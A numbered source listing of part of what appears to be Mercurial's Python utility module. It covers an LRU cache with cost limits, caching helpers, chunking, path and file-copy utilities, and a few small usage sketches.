1371 Holds a reference to nodes on either side as well as a key-value
1371 Holds a reference to nodes on either side as well as a key-value
1372 pair for the dictionary entry.
1372 pair for the dictionary entry.
1373 """
1373 """
1374
1374
1375 __slots__ = ('next', 'prev', 'key', 'value', 'cost')
1375 __slots__ = ('next', 'prev', 'key', 'value', 'cost')
1376
1376
1377 def __init__(self):
1377 def __init__(self):
1378 self.next = None
1378 self.next = None
1379 self.prev = None
1379 self.prev = None
1380
1380
1381 self.key = _notset
1381 self.key = _notset
1382 self.value = None
1382 self.value = None
1383 self.cost = 0
1383 self.cost = 0
1384
1384
1385 def markempty(self):
1385 def markempty(self):
1386 """Mark the node as emptied."""
1386 """Mark the node as emptied."""
1387 self.key = _notset
1387 self.key = _notset
1388 self.value = None
1388 self.value = None
1389 self.cost = 0
1389 self.cost = 0
1390
1390
1391
1391
1392 class lrucachedict(object):
1392 class lrucachedict(object):
1393 """Dict that caches most recent accesses and sets.
1393 """Dict that caches most recent accesses and sets.
1394
1394
1395 The dict consists of an actual backing dict - indexed by original
1395 The dict consists of an actual backing dict - indexed by original
1396 key - and a doubly linked circular list defining the order of entries in
1396 key - and a doubly linked circular list defining the order of entries in
1397 the cache.
1397 the cache.
1398
1398
1399 The head node is the newest entry in the cache. If the cache is full,
1399 The head node is the newest entry in the cache. If the cache is full,
1400 we recycle head.prev and make it the new head. Cache accesses result in
1400 we recycle head.prev and make it the new head. Cache accesses result in
1401 the node being moved to before the existing head and being marked as the
1401 the node being moved to before the existing head and being marked as the
1402 new head node.
1402 new head node.
1403
1403
1404 Items in the cache can be inserted with an optional "cost" value. This is
1404 Items in the cache can be inserted with an optional "cost" value. This is
1405 simply an integer that is specified by the caller. The cache can be queried
1405 simply an integer that is specified by the caller. The cache can be queried
1406 for the total cost of all items presently in the cache.
1406 for the total cost of all items presently in the cache.
1407
1407
1408 The cache can also define a maximum cost. If a cache insertion would
1408 The cache can also define a maximum cost. If a cache insertion would
1409 cause the total cost of the cache to go beyond the maximum cost limit,
1409 cause the total cost of the cache to go beyond the maximum cost limit,
1410 nodes will be evicted to make room for the new node. This can be used
1411 to e.g. set a max memory limit and associate an estimated bytes size
1411 to e.g. set a max memory limit and associate an estimated bytes size
1412 cost to each item in the cache. By default, no maximum cost is enforced.
1412 cost to each item in the cache. By default, no maximum cost is enforced.
1413 """
1413 """
1414
1414
1415 def __init__(self, max, maxcost=0):
1415 def __init__(self, max, maxcost=0):
1416 self._cache = {}
1416 self._cache = {}
1417
1417
1418 self._head = head = _lrucachenode()
1418 self._head = head = _lrucachenode()
1419 head.prev = head
1419 head.prev = head
1420 head.next = head
1420 head.next = head
1421 self._size = 1
1421 self._size = 1
1422 self.capacity = max
1422 self.capacity = max
1423 self.totalcost = 0
1423 self.totalcost = 0
1424 self.maxcost = maxcost
1424 self.maxcost = maxcost
1425
1425
1426 def __len__(self):
1426 def __len__(self):
1427 return len(self._cache)
1427 return len(self._cache)
1428
1428
1429 def __contains__(self, k):
1429 def __contains__(self, k):
1430 return k in self._cache
1430 return k in self._cache
1431
1431
1432 def __iter__(self):
1432 def __iter__(self):
1433 # We don't have to iterate in cache order, but why not.
1433 # We don't have to iterate in cache order, but why not.
1434 n = self._head
1434 n = self._head
1435 for i in range(len(self._cache)):
1435 for i in range(len(self._cache)):
1436 yield n.key
1436 yield n.key
1437 n = n.next
1437 n = n.next
1438
1438
1439 def __getitem__(self, k):
1439 def __getitem__(self, k):
1440 node = self._cache[k]
1440 node = self._cache[k]
1441 self._movetohead(node)
1441 self._movetohead(node)
1442 return node.value
1442 return node.value
1443
1443
1444 def insert(self, k, v, cost=0):
1444 def insert(self, k, v, cost=0):
1445 """Insert a new item in the cache with optional cost value."""
1445 """Insert a new item in the cache with optional cost value."""
1446 node = self._cache.get(k)
1446 node = self._cache.get(k)
1447 # Replace existing value and mark as newest.
1447 # Replace existing value and mark as newest.
1448 if node is not None:
1448 if node is not None:
1449 self.totalcost -= node.cost
1449 self.totalcost -= node.cost
1450 node.value = v
1450 node.value = v
1451 node.cost = cost
1451 node.cost = cost
1452 self.totalcost += cost
1452 self.totalcost += cost
1453 self._movetohead(node)
1453 self._movetohead(node)
1454
1454
1455 if self.maxcost:
1455 if self.maxcost:
1456 self._enforcecostlimit()
1456 self._enforcecostlimit()
1457
1457
1458 return
1458 return
1459
1459
1460 if self._size < self.capacity:
1460 if self._size < self.capacity:
1461 node = self._addcapacity()
1461 node = self._addcapacity()
1462 else:
1462 else:
1463 # Grab the last/oldest item.
1463 # Grab the last/oldest item.
1464 node = self._head.prev
1464 node = self._head.prev
1465
1465
1466 # At capacity. Kill the old entry.
1466 # At capacity. Kill the old entry.
1467 if node.key is not _notset:
1467 if node.key is not _notset:
1468 self.totalcost -= node.cost
1468 self.totalcost -= node.cost
1469 del self._cache[node.key]
1469 del self._cache[node.key]
1470
1470
1471 node.key = k
1471 node.key = k
1472 node.value = v
1472 node.value = v
1473 node.cost = cost
1473 node.cost = cost
1474 self.totalcost += cost
1474 self.totalcost += cost
1475 self._cache[k] = node
1475 self._cache[k] = node
1476 # And mark it as newest entry. No need to adjust order since it
1476 # And mark it as newest entry. No need to adjust order since it
1477 # is already self._head.prev.
1477 # is already self._head.prev.
1478 self._head = node
1478 self._head = node
1479
1479
1480 if self.maxcost:
1480 if self.maxcost:
1481 self._enforcecostlimit()
1481 self._enforcecostlimit()
1482
1482
1483 def __setitem__(self, k, v):
1483 def __setitem__(self, k, v):
1484 self.insert(k, v)
1484 self.insert(k, v)
1485
1485
1486 def __delitem__(self, k):
1486 def __delitem__(self, k):
1487 self.pop(k)
1487 self.pop(k)
1488
1488
1489 def pop(self, k, default=_notset):
1489 def pop(self, k, default=_notset):
1490 try:
1490 try:
1491 node = self._cache.pop(k)
1491 node = self._cache.pop(k)
1492 except KeyError:
1492 except KeyError:
1493 if default is _notset:
1493 if default is _notset:
1494 raise
1494 raise
1495 return default
1495 return default
1496
1496
1497 assert node is not None # help pytype
1497 assert node is not None # help pytype
1498 value = node.value
1498 value = node.value
1499 self.totalcost -= node.cost
1499 self.totalcost -= node.cost
1500 node.markempty()
1500 node.markempty()
1501
1501
1502 # Temporarily mark as newest item before re-adjusting head to make
1502 # Temporarily mark as newest item before re-adjusting head to make
1503 # this node the oldest item.
1503 # this node the oldest item.
1504 self._movetohead(node)
1504 self._movetohead(node)
1505 self._head = node.next
1505 self._head = node.next
1506
1506
1507 return value
1507 return value
1508
1508
1509 # Additional dict methods.
1509 # Additional dict methods.
1510
1510
1511 def get(self, k, default=None):
1511 def get(self, k, default=None):
1512 try:
1512 try:
1513 return self.__getitem__(k)
1513 return self.__getitem__(k)
1514 except KeyError:
1514 except KeyError:
1515 return default
1515 return default
1516
1516
1517 def peek(self, k, default=_notset):
1517 def peek(self, k, default=_notset):
1518 """Get the specified item without moving it to the head
1518 """Get the specified item without moving it to the head
1519
1519
1520 Unlike get(), this doesn't mutate the internal state. But be aware
1521 that this does not make peek() thread safe.
1522 """
1522 """
1523 try:
1523 try:
1524 node = self._cache[k]
1524 node = self._cache[k]
1525 return node.value
1525 return node.value
1526 except KeyError:
1526 except KeyError:
1527 if default is _notset:
1527 if default is _notset:
1528 raise
1528 raise
1529 return default
1529 return default
1530
1530
1531 def clear(self):
1531 def clear(self):
1532 n = self._head
1532 n = self._head
1533 while n.key is not _notset:
1533 while n.key is not _notset:
1534 self.totalcost -= n.cost
1534 self.totalcost -= n.cost
1535 n.markempty()
1535 n.markempty()
1536 n = n.next
1536 n = n.next
1537
1537
1538 self._cache.clear()
1538 self._cache.clear()
1539
1539
1540 def copy(self, capacity=None, maxcost=0):
1540 def copy(self, capacity=None, maxcost=0):
1541 """Create a new cache as a copy of the current one.
1541 """Create a new cache as a copy of the current one.
1542
1542
1543 By default, the new cache has the same capacity as the existing one.
1543 By default, the new cache has the same capacity as the existing one.
1544 But, the cache capacity can be changed as part of performing the
1544 But, the cache capacity can be changed as part of performing the
1545 copy.
1545 copy.
1546
1546
1547 Items in the copy have an insertion/access order matching this
1547 Items in the copy have an insertion/access order matching this
1548 instance.
1548 instance.
1549 """
1549 """
1550
1550
1551 capacity = capacity or self.capacity
1551 capacity = capacity or self.capacity
1552 maxcost = maxcost or self.maxcost
1552 maxcost = maxcost or self.maxcost
1553 result = lrucachedict(capacity, maxcost=maxcost)
1553 result = lrucachedict(capacity, maxcost=maxcost)
1554
1554
1555 # We copy entries by iterating in oldest-to-newest order so the copy
1555 # We copy entries by iterating in oldest-to-newest order so the copy
1556 # has the correct ordering.
1556 # has the correct ordering.
1557
1557
1558 # Find the first non-empty entry.
1558 # Find the first non-empty entry.
1559 n = self._head.prev
1559 n = self._head.prev
1560 while n.key is _notset and n is not self._head:
1560 while n.key is _notset and n is not self._head:
1561 n = n.prev
1561 n = n.prev
1562
1562
1563 # We could potentially skip the first N items when decreasing capacity.
1563 # We could potentially skip the first N items when decreasing capacity.
1564 # But let's keep it simple unless it is a performance problem.
1564 # But let's keep it simple unless it is a performance problem.
1565 for i in range(len(self._cache)):
1565 for i in range(len(self._cache)):
1566 result.insert(n.key, n.value, cost=n.cost)
1566 result.insert(n.key, n.value, cost=n.cost)
1567 n = n.prev
1567 n = n.prev
1568
1568
1569 return result
1569 return result
1570
1570
1571 def popoldest(self):
1571 def popoldest(self):
1572 """Remove the oldest item from the cache.
1572 """Remove the oldest item from the cache.
1573
1573
1574 Returns the (key, value) describing the removed cache entry.
1574 Returns the (key, value) describing the removed cache entry.
1575 """
1575 """
1576 if not self._cache:
1576 if not self._cache:
1577 return
1577 return
1578
1578
1579 # Walk the linked list backwards starting at tail node until we hit
1579 # Walk the linked list backwards starting at tail node until we hit
1580 # a non-empty node.
1580 # a non-empty node.
1581 n = self._head.prev
1581 n = self._head.prev
1582 while n.key is _notset:
1582 while n.key is _notset:
1583 n = n.prev
1583 n = n.prev
1584
1584
1585 assert n is not None # help pytype
1585 assert n is not None # help pytype
1586
1586
1587 key, value = n.key, n.value
1587 key, value = n.key, n.value
1588
1588
1589 # And remove it from the cache and mark it as empty.
1589 # And remove it from the cache and mark it as empty.
1590 del self._cache[n.key]
1590 del self._cache[n.key]
1591 self.totalcost -= n.cost
1591 self.totalcost -= n.cost
1592 n.markempty()
1592 n.markempty()
1593
1593
1594 return key, value
1594 return key, value
1595
1595
1596 def _movetohead(self, node):
1596 def _movetohead(self, node):
1597 """Mark a node as the newest, making it the new head.
1597 """Mark a node as the newest, making it the new head.
1598
1598
1599 When a node is accessed, it becomes the freshest entry in the LRU
1599 When a node is accessed, it becomes the freshest entry in the LRU
1600 list, which is denoted by self._head.
1600 list, which is denoted by self._head.
1601
1601
1602 Visually, let's make ``N`` the new head node (* denotes head):
1602 Visually, let's make ``N`` the new head node (* denotes head):
1603
1603
1604 previous/oldest <-> head <-> next/next newest
1604 previous/oldest <-> head <-> next/next newest
1605
1605
1606 ----<->--- A* ---<->-----
1606 ----<->--- A* ---<->-----
1607 | |
1607 | |
1608 E <-> D <-> N <-> C <-> B
1608 E <-> D <-> N <-> C <-> B
1609
1609
1610 To:
1610 To:
1611
1611
1612 ----<->--- N* ---<->-----
1612 ----<->--- N* ---<->-----
1613 | |
1613 | |
1614 E <-> D <-> C <-> B <-> A
1614 E <-> D <-> C <-> B <-> A
1615
1615
1616 This requires the following moves:
1616 This requires the following moves:
1617
1617
1618 C.next = D (node.prev.next = node.next)
1618 C.next = D (node.prev.next = node.next)
1619 D.prev = C (node.next.prev = node.prev)
1619 D.prev = C (node.next.prev = node.prev)
1620 E.next = N (head.prev.next = node)
1620 E.next = N (head.prev.next = node)
1621 N.prev = E (node.prev = head.prev)
1621 N.prev = E (node.prev = head.prev)
1622 N.next = A (node.next = head)
1622 N.next = A (node.next = head)
1623 A.prev = N (head.prev = node)
1623 A.prev = N (head.prev = node)
1624 """
1624 """
1625 head = self._head
1625 head = self._head
1626 # C.next = D
1626 # C.next = D
1627 node.prev.next = node.next
1627 node.prev.next = node.next
1628 # D.prev = C
1628 # D.prev = C
1629 node.next.prev = node.prev
1629 node.next.prev = node.prev
1630 # N.prev = E
1630 # N.prev = E
1631 node.prev = head.prev
1631 node.prev = head.prev
1632 # N.next = A
1632 # N.next = A
1633 # It is tempting to do just "head" here; however, if node is
1634 # adjacent to head, this will do bad things.
1635 node.next = head.prev.next
1635 node.next = head.prev.next
1636 # E.next = N
1636 # E.next = N
1637 node.next.prev = node
1637 node.next.prev = node
1638 # A.prev = N
1638 # A.prev = N
1639 node.prev.next = node
1639 node.prev.next = node
1640
1640
1641 self._head = node
1641 self._head = node
1642
1642
1643 def _addcapacity(self):
1643 def _addcapacity(self):
1644 """Add a node to the circular linked list.
1644 """Add a node to the circular linked list.
1645
1645
1646 The new node is inserted before the head node.
1646 The new node is inserted before the head node.
1647 """
1647 """
1648 head = self._head
1648 head = self._head
1649 node = _lrucachenode()
1649 node = _lrucachenode()
1650 head.prev.next = node
1650 head.prev.next = node
1651 node.prev = head.prev
1651 node.prev = head.prev
1652 node.next = head
1652 node.next = head
1653 head.prev = node
1653 head.prev = node
1654 self._size += 1
1654 self._size += 1
1655 return node
1655 return node
1656
1656
1657 def _enforcecostlimit(self):
1657 def _enforcecostlimit(self):
1658 # This should run after an insertion. It should only be called if total
1658 # This should run after an insertion. It should only be called if total
1659 # cost limits are being enforced.
1659 # cost limits are being enforced.
1660 # The most recently inserted node is never evicted.
1660 # The most recently inserted node is never evicted.
1661 if len(self) <= 1 or self.totalcost <= self.maxcost:
1661 if len(self) <= 1 or self.totalcost <= self.maxcost:
1662 return
1662 return
1663
1663
1664 # This is logically equivalent to calling popoldest() until we
1664 # This is logically equivalent to calling popoldest() until we
1665 # free up enough cost. We don't do that since popoldest() needs
1665 # free up enough cost. We don't do that since popoldest() needs
1666 # to walk the linked list and doing this in a loop would be
1666 # to walk the linked list and doing this in a loop would be
1667 # quadratic. So we find the first non-empty node and then
1667 # quadratic. So we find the first non-empty node and then
1668 # walk nodes until we free up enough capacity.
1668 # walk nodes until we free up enough capacity.
1669 #
1669 #
1670 # If we only removed the minimum number of nodes to free enough
1670 # If we only removed the minimum number of nodes to free enough
1671 # cost at insert time, chances are high that the next insert would
1671 # cost at insert time, chances are high that the next insert would
1672 # also require pruning. This would effectively constitute quadratic
1672 # also require pruning. This would effectively constitute quadratic
1673 # behavior for insert-heavy workloads. To mitigate this, we set a
1673 # behavior for insert-heavy workloads. To mitigate this, we set a
1674 # target cost that is a percentage of the max cost. This will tend
1674 # target cost that is a percentage of the max cost. This will tend
1675 # to free more nodes when the high water mark is reached, which
1675 # to free more nodes when the high water mark is reached, which
1676 # lowers the chances of needing to prune on the subsequent insert.
1676 # lowers the chances of needing to prune on the subsequent insert.
1677 targetcost = int(self.maxcost * 0.75)
1677 targetcost = int(self.maxcost * 0.75)
1678
1678
1679 n = self._head.prev
1679 n = self._head.prev
1680 while n.key is _notset:
1680 while n.key is _notset:
1681 n = n.prev
1681 n = n.prev
1682
1682
1683 while len(self) > 1 and self.totalcost > targetcost:
1683 while len(self) > 1 and self.totalcost > targetcost:
1684 del self._cache[n.key]
1684 del self._cache[n.key]
1685 self.totalcost -= n.cost
1685 self.totalcost -= n.cost
1686 n.markempty()
1686 n.markempty()
1687 n = n.prev
1687 n = n.prev
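
# A minimal usage sketch (not part of the original module): a small cache
# with a maximum total cost, demonstrating cost-based eviction. The keys,
# values and costs are illustrative only.
def _example_lrucachedict():
    d = lrucachedict(4, maxcost=10)
    d.insert(b'a', b'aval', cost=6)
    d.insert(b'b', b'bval', cost=6)  # total cost 12 > 10, so b'a' is evicted
    present = b'a' in d  # False
    d[b'c'] = b'cval'  # plain __setitem__ inserts with cost 0
    oldest = d.popoldest()  # (b'b', b'bval')
    return present, oldest, d.totalcost  # (False, (b'b', b'bval'), 0)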
1688
1688
1689
1689
1690 def lrucachefunc(func):
1690 def lrucachefunc(func):
1691 '''cache most recent results of function calls'''
1691 '''cache most recent results of function calls'''
1692 cache = {}
1692 cache = {}
1693 order = collections.deque()
1693 order = collections.deque()
1694 if func.__code__.co_argcount == 1:
1694 if func.__code__.co_argcount == 1:
1695
1695
1696 def f(arg):
1696 def f(arg):
1697 if arg not in cache:
1697 if arg not in cache:
1698 if len(cache) > 20:
1698 if len(cache) > 20:
1699 del cache[order.popleft()]
1699 del cache[order.popleft()]
1700 cache[arg] = func(arg)
1700 cache[arg] = func(arg)
1701 else:
1701 else:
1702 order.remove(arg)
1702 order.remove(arg)
1703 order.append(arg)
1703 order.append(arg)
1704 return cache[arg]
1704 return cache[arg]
1705
1705
1706 else:
1706 else:
1707
1707
1708 def f(*args):
1708 def f(*args):
1709 if args not in cache:
1709 if args not in cache:
1710 if len(cache) > 20:
1710 if len(cache) > 20:
1711 del cache[order.popleft()]
1711 del cache[order.popleft()]
1712 cache[args] = func(*args)
1712 cache[args] = func(*args)
1713 else:
1713 else:
1714 order.remove(args)
1714 order.remove(args)
1715 order.append(args)
1715 order.append(args)
1716 return cache[args]
1716 return cache[args]
1717
1717
1718 return f
1718 return f
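
# A minimal usage sketch (not part of the original module): lrucachefunc
# keeps only the most recent results (about 20), so arguments seen long
# ago are recomputed. The function below is illustrative only.
def _example_lrucachefunc():
    calls = []

    def double(x):
        calls.append(x)
        return x * 2

    cached = lrucachefunc(double)
    for i in range(25):
        cached(i)
    cached(24)  # still cached: no extra call
    cached(0)  # evicted long ago: recomputed
    return len(calls)  # 26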
1719
1719
1720
1720
1721 class propertycache(object):
1721 class propertycache(object):
1722 def __init__(self, func):
1722 def __init__(self, func):
1723 self.func = func
1723 self.func = func
1724 self.name = func.__name__
1724 self.name = func.__name__
1725
1725
1726 def __get__(self, obj, type=None):
1726 def __get__(self, obj, type=None):
1727 result = self.func(obj)
1727 result = self.func(obj)
1728 self.cachevalue(obj, result)
1728 self.cachevalue(obj, result)
1729 return result
1729 return result
1730
1730
1731 def cachevalue(self, obj, value):
1731 def cachevalue(self, obj, value):
1732 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1732 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1733 obj.__dict__[self.name] = value
1733 obj.__dict__[self.name] = value
1734
1734
1735
1735
1736 def clearcachedproperty(obj, prop):
1736 def clearcachedproperty(obj, prop):
1737 '''clear a cached property value, if one has been set'''
1737 '''clear a cached property value, if one has been set'''
1738 prop = pycompat.sysstr(prop)
1738 prop = pycompat.sysstr(prop)
1739 if prop in obj.__dict__:
1739 if prop in obj.__dict__:
1740 del obj.__dict__[prop]
1740 del obj.__dict__[prop]
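
# A minimal sketch (not part of the original module): the decorated method
# runs once, its value is cached on the instance, and clearcachedproperty()
# forces a recomputation. The example class is illustrative only.
def _example_propertycache():
    calls = []

    class widget(object):
        @propertycache
        def expensive(self):
            calls.append(1)
            return 42

    w = widget()
    w.expensive
    w.expensive  # served from w.__dict__, not recomputed
    clearcachedproperty(w, b'expensive')
    w.expensive  # recomputed after the cached value was dropped
    return len(calls)  # 2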
1741
1741
1742
1742
1743 def increasingchunks(source, min=1024, max=65536):
1743 def increasingchunks(source, min=1024, max=65536):
1744 '''return no less than min bytes per chunk while data remains,
1744 '''return no less than min bytes per chunk while data remains,
1745 doubling min after each chunk until it reaches max'''
1745 doubling min after each chunk until it reaches max'''
1746
1746
1747 def log2(x):
1747 def log2(x):
1748 if not x:
1748 if not x:
1749 return 0
1749 return 0
1750 i = 0
1750 i = 0
1751 while x:
1751 while x:
1752 x >>= 1
1752 x >>= 1
1753 i += 1
1753 i += 1
1754 return i - 1
1754 return i - 1
1755
1755
1756 buf = []
1756 buf = []
1757 blen = 0
1757 blen = 0
1758 for chunk in source:
1758 for chunk in source:
1759 buf.append(chunk)
1759 buf.append(chunk)
1760 blen += len(chunk)
1760 blen += len(chunk)
1761 if blen >= min:
1761 if blen >= min:
1762 if min < max:
1762 if min < max:
1763 min = min << 1
1763 min = min << 1
1764 nmin = 1 << log2(blen)
1764 nmin = 1 << log2(blen)
1765 if nmin > min:
1765 if nmin > min:
1766 min = nmin
1766 min = nmin
1767 if min > max:
1767 if min > max:
1768 min = max
1768 min = max
1769 yield b''.join(buf)
1769 yield b''.join(buf)
1770 blen = 0
1770 blen = 0
1771 buf = []
1771 buf = []
1772 if buf:
1772 if buf:
1773 yield b''.join(buf)
1773 yield b''.join(buf)
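
# A minimal usage sketch (not part of the original module): many small
# chunks are coalesced into progressively larger ones. The chunk counts
# and sizes below are illustrative only.
def _example_increasingchunks():
    source = (b'x' * 100 for _ in range(100))  # 100 chunks of 100 bytes
    sizes = [
        len(chunk) for chunk in increasingchunks(source, min=256, max=4096)
    ]
    # Every chunk but the last is at least 256 bytes, and sizes roughly
    # double until they approach 4096.
    return sizes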
1774
1774
1775
1775
1776 def always(fn):
1776 def always(fn):
1777 return True
1777 return True
1778
1778
1779
1779
1780 def never(fn):
1780 def never(fn):
1781 return False
1781 return False
1782
1782
1783
1783
1784 def nogc(func):
1784 def nogc(func):
1785 """disable garbage collector
1785 """disable garbage collector
1786
1786
1787 Python's garbage collector triggers a GC each time a certain number of
1787 Python's garbage collector triggers a GC each time a certain number of
1788 container objects (the number being defined by gc.get_threshold()) are
1788 container objects (the number being defined by gc.get_threshold()) are
1789 allocated even when marked not to be tracked by the collector. Tracking has
1789 allocated even when marked not to be tracked by the collector. Tracking has
1790 no effect on when GCs are triggered, only on what objects the GC looks
1790 no effect on when GCs are triggered, only on what objects the GC looks
1791 into. As a workaround, disable GC while building complex (huge)
1791 into. As a workaround, disable GC while building complex (huge)
1792 containers.
1792 containers.
1793
1793
1794 This garbage collector issue has been fixed in 2.7, but it still affects
1795 CPython's performance.
1796 """
1796 """
1797
1797
1798 def wrapper(*args, **kwargs):
1798 def wrapper(*args, **kwargs):
1799 gcenabled = gc.isenabled()
1799 gcenabled = gc.isenabled()
1800 gc.disable()
1800 gc.disable()
1801 try:
1801 try:
1802 return func(*args, **kwargs)
1802 return func(*args, **kwargs)
1803 finally:
1803 finally:
1804 if gcenabled:
1804 if gcenabled:
1805 gc.enable()
1805 gc.enable()
1806
1806
1807 return wrapper
1807 return wrapper
1808
1808
1809
1809
1810 if pycompat.ispypy:
1810 if pycompat.ispypy:
1811 # PyPy runs slower with gc disabled
1811 # PyPy runs slower with gc disabled
1812 nogc = lambda x: x
1812 nogc = lambda x: x
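
# A minimal usage sketch (not part of the original module): build a large
# container with the cyclic garbage collector paused (a no-op on PyPy,
# where nogc is the identity). The function below is illustrative only.
@nogc
def _example_buildmapping(n):
    return {i: (i, i + 1) for i in range(n)}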
1813
1813
1814
1814
1815 def pathto(root, n1, n2):
1815 def pathto(root, n1, n2):
1816 '''return the relative path from one place to another.
1816 '''return the relative path from one place to another.
1817 root should use os.sep to separate directories
1817 root should use os.sep to separate directories
1818 n1 should use os.sep to separate directories
1818 n1 should use os.sep to separate directories
1819 n2 should use "/" to separate directories
1819 n2 should use "/" to separate directories
1820 returns an os.sep-separated path.
1820 returns an os.sep-separated path.
1821
1821
1822 If n1 is a relative path, it's assumed it's
1822 If n1 is a relative path, it's assumed it's
1823 relative to root.
1823 relative to root.
1824 n2 should always be relative to root.
1824 n2 should always be relative to root.
1825 '''
1825 '''
1826 if not n1:
1826 if not n1:
1827 return localpath(n2)
1827 return localpath(n2)
1828 if os.path.isabs(n1):
1828 if os.path.isabs(n1):
1829 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1829 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1830 return os.path.join(root, localpath(n2))
1830 return os.path.join(root, localpath(n2))
1831 n2 = b'/'.join((pconvert(root), n2))
1831 n2 = b'/'.join((pconvert(root), n2))
1832 a, b = splitpath(n1), n2.split(b'/')
1832 a, b = splitpath(n1), n2.split(b'/')
1833 a.reverse()
1833 a.reverse()
1834 b.reverse()
1834 b.reverse()
1835 while a and b and a[-1] == b[-1]:
1835 while a and b and a[-1] == b[-1]:
1836 a.pop()
1836 a.pop()
1837 b.pop()
1837 b.pop()
1838 b.reverse()
1838 b.reverse()
1839 return pycompat.ossep.join(([b'..'] * len(a)) + b) or b'.'
1839 return pycompat.ossep.join(([b'..'] * len(a)) + b) or b'.'
1840
1840
1841
1841
1842 def checksignature(func):
1842 def checksignature(func):
1843 '''wrap a function with code to check for calling errors'''
1843 '''wrap a function with code to check for calling errors'''
1844
1844
1845 def check(*args, **kwargs):
1845 def check(*args, **kwargs):
1846 try:
1846 try:
1847 return func(*args, **kwargs)
1847 return func(*args, **kwargs)
1848 except TypeError:
1848 except TypeError:
1849 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1849 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1850 raise error.SignatureError
1850 raise error.SignatureError
1851 raise
1851 raise
1852
1852
1853 return check
1853 return check
1854
1854
1855
1855
1856 # a whitelist of known filesystems where hardlinks work reliably
1857 _hardlinkfswhitelist = {
1857 _hardlinkfswhitelist = {
1858 b'apfs',
1858 b'apfs',
1859 b'btrfs',
1859 b'btrfs',
1860 b'ext2',
1860 b'ext2',
1861 b'ext3',
1861 b'ext3',
1862 b'ext4',
1862 b'ext4',
1863 b'hfs',
1863 b'hfs',
1864 b'jfs',
1864 b'jfs',
1865 b'NTFS',
1865 b'NTFS',
1866 b'reiserfs',
1866 b'reiserfs',
1867 b'tmpfs',
1867 b'tmpfs',
1868 b'ufs',
1868 b'ufs',
1869 b'xfs',
1869 b'xfs',
1870 b'zfs',
1870 b'zfs',
1871 }
1871 }
1872
1872
1873
1873
1874 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1874 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1875 '''copy a file, preserving mode and optionally other stat info like
1875 '''copy a file, preserving mode and optionally other stat info like
1876 atime/mtime
1876 atime/mtime
1877
1877
1878 checkambig argument is used with filestat, and is useful only if
1878 checkambig argument is used with filestat, and is useful only if
1879 destination file is guarded by any lock (e.g. repo.lock or
1879 destination file is guarded by any lock (e.g. repo.lock or
1880 repo.wlock).
1880 repo.wlock).
1881
1881
1882 copystat and checkambig should be exclusive.
1882 copystat and checkambig should be exclusive.
1883 '''
1883 '''
1884 assert not (copystat and checkambig)
1884 assert not (copystat and checkambig)
1885 oldstat = None
1885 oldstat = None
1886 if os.path.lexists(dest):
1886 if os.path.lexists(dest):
1887 if checkambig:
1887 if checkambig:
1888 oldstat = checkambig and filestat.frompath(dest)
1888 oldstat = checkambig and filestat.frompath(dest)
1889 unlink(dest)
1889 unlink(dest)
1890 if hardlink:
1890 if hardlink:
1891 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1891 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1892 # unless we are confident that dest is on a whitelisted filesystem.
1892 # unless we are confident that dest is on a whitelisted filesystem.
1893 try:
1893 try:
1894 fstype = getfstype(os.path.dirname(dest))
1894 fstype = getfstype(os.path.dirname(dest))
1895 except OSError:
1895 except OSError:
1896 fstype = None
1896 fstype = None
1897 if fstype not in _hardlinkfswhitelist:
1897 if fstype not in _hardlinkfswhitelist:
1898 hardlink = False
1898 hardlink = False
1899 if hardlink:
1899 if hardlink:
1900 try:
1900 try:
1901 oslink(src, dest)
1901 oslink(src, dest)
1902 return
1902 return
1903 except (IOError, OSError):
1903 except (IOError, OSError):
1904 pass # fall back to normal copy
1904 pass # fall back to normal copy
1905 if os.path.islink(src):
1905 if os.path.islink(src):
1906 os.symlink(os.readlink(src), dest)
1906 os.symlink(os.readlink(src), dest)
1907 # copytime is ignored for symlinks, but in general copytime isn't needed
1907 # copytime is ignored for symlinks, but in general copytime isn't needed
1908 # for them anyway
1908 # for them anyway
1909 else:
1909 else:
1910 try:
1910 try:
1911 shutil.copyfile(src, dest)
1911 shutil.copyfile(src, dest)
1912 if copystat:
1912 if copystat:
1913 # copystat also copies mode
1913 # copystat also copies mode
1914 shutil.copystat(src, dest)
1914 shutil.copystat(src, dest)
1915 else:
1915 else:
1916 shutil.copymode(src, dest)
1916 shutil.copymode(src, dest)
1917 if oldstat and oldstat.stat:
1917 if oldstat and oldstat.stat:
1918 newstat = filestat.frompath(dest)
1918 newstat = filestat.frompath(dest)
1919 if newstat.isambig(oldstat):
1919 if newstat.isambig(oldstat):
1920 # stat of copied file is ambiguous to original one
1920 # stat of copied file is ambiguous to original one
1921 advanced = (
1921 advanced = (
1922 oldstat.stat[stat.ST_MTIME] + 1
1922 oldstat.stat[stat.ST_MTIME] + 1
1923 ) & 0x7FFFFFFF
1923 ) & 0x7FFFFFFF
1924 os.utime(dest, (advanced, advanced))
1924 os.utime(dest, (advanced, advanced))
1925 except shutil.Error as inst:
1925 except shutil.Error as inst:
1926 raise error.Abort(stringutil.forcebytestr(inst))
1926 raise error.Abort(stringutil.forcebytestr(inst))
1927
1927
1928
1928
1929 def copyfiles(src, dst, hardlink=None, progress=None):
1929 def copyfiles(src, dst, hardlink=None, progress=None):
1930 """Copy a directory tree using hardlinks if possible."""
1930 """Copy a directory tree using hardlinks if possible."""
1931 num = 0
1931 num = 0
1932
1932
1933 def settopic():
1933 def settopic():
1934 if progress:
1934 if progress:
1935 progress.topic = _(b'linking') if hardlink else _(b'copying')
1935 progress.topic = _(b'linking') if hardlink else _(b'copying')
1936
1936
1937 if os.path.isdir(src):
1937 if os.path.isdir(src):
1938 if hardlink is None:
1938 if hardlink is None:
1939 hardlink = (
1939 hardlink = (
1940 os.stat(src).st_dev == os.stat(os.path.dirname(dst)).st_dev
1940 os.stat(src).st_dev == os.stat(os.path.dirname(dst)).st_dev
1941 )
1941 )
1942 settopic()
1942 settopic()
1943 os.mkdir(dst)
1943 os.mkdir(dst)
1944 for name, kind in listdir(src):
1944 for name, kind in listdir(src):
1945 srcname = os.path.join(src, name)
1945 srcname = os.path.join(src, name)
